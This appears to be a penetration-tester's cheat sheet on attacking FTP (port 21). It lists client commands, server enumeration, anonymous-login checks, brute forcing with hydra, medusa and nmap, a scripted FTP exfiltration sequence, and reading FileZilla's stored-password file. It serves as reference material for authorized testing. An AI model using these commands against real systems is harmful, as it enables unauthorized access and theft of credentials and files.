21 - FTP

Usage

FTP operates in two modes for data transfer:

• In active mode, the client opens a port and listens while the server connects back to the client to transfer data.

• In passive mode, the server opens a port and the client initiates the connection, which helps navigate firewalls or NAT restrictions more easily.

FTP also supports two data transfer types:

• Binary mode transfers files byte-for-byte, preserving exact file contents, which is essential for non-text files like images or executables.

• ASCII mode converts line endings and text formatting to match the target system, suitable for plain text files but potentially corrupting binary data.

Connect

# Connect to FTP server
ftp <target>

# No auto login (useful for scripts)
ftp -n <targetp> 

# Verbose mode         
ftp -v <target>          

# Log in as a specific user
ftp <user>@<target>

Banner Grabbing

telnet <target> 21
nc <target> 21

Basic Commands

# List all (including hidden) files
ls -a
dir -a                   

# Change directory
cd <directory>              

# Change local directory
lcd <local_directory>                      

# Delete file
delete <file>               

# Create directory
mkdir <directory>           

# Remove directory
rmdir <directory>           

# Show remote current directory
pwd                         

# Disconnect
bye / quit / exit           

Enumeration

# Get OS type
quote SYST

# Check for passive mode
quote PASV                  

# List server supported commands
quote HELP                  

# Server status
quote STAT                  

# List server features
quote FEAT                  

# Site-specific commands
quote SITE HELP             

Transfer

# Download file
get <file>                  

# Download multiple files
mget <files>                

# Upload file
put <file>                  

# Upload multiple files
mput <files> 

# Download an FTP directory
wget -r ftp://username:password@<target-ip></directory/>

Attacks

Anon

Sometimes are configured to accept passwordless anonymous and/or default logins:

ftp ftp@<server-ip>
ftp anonymous@<server-ip>

BFA

# Using hydra
hydra -l <user> -P <passlist> ftp://<target> 

# Using medusa
medusa -h <target> -u <user> -P <passlist> -M ftp

# Using nmap 
nmap -p 21 --script ftp-brute <target>

Vulnerability Recon

nmap -p 21 --script ftp-anon,ftp-bounce,ftp-vsftpd-backdoor,ftp-proftpd-backdoor <target>

File Exfil

# File exfiltration / upload with command-line FTP
echo "open <target>" > script.txt
echo "user anonymous anonymous" >> script.txt
echo "binary" >> script.txt
echo "get secret.txt" >> script.txt
echo "bye" >> script.txt
ftp -n -s:script.txt

Applications

FileZilla

FileZilla is a cross-platform FTP, FTPS, and SFTP client and server application that enables the transfer of files between local systems and remote servers. The client provides a graphical interface for managing file uploads and downloads, directory navigation, and permissions, while the server component allows administrators to configure user accounts, access controls, and transfer policies. Security features include support for secure protocols (FTPS and SFTP) to protect credentials and data in transit, as well as configurable logging and IP-based access restrictions.

Password Files

FileZilla passwords are stored in the recentservers.xml file, typically, in a base64-encoded format:

type C:\Users\x7331\AppData\Roaming\FileZilla\recentservers.xml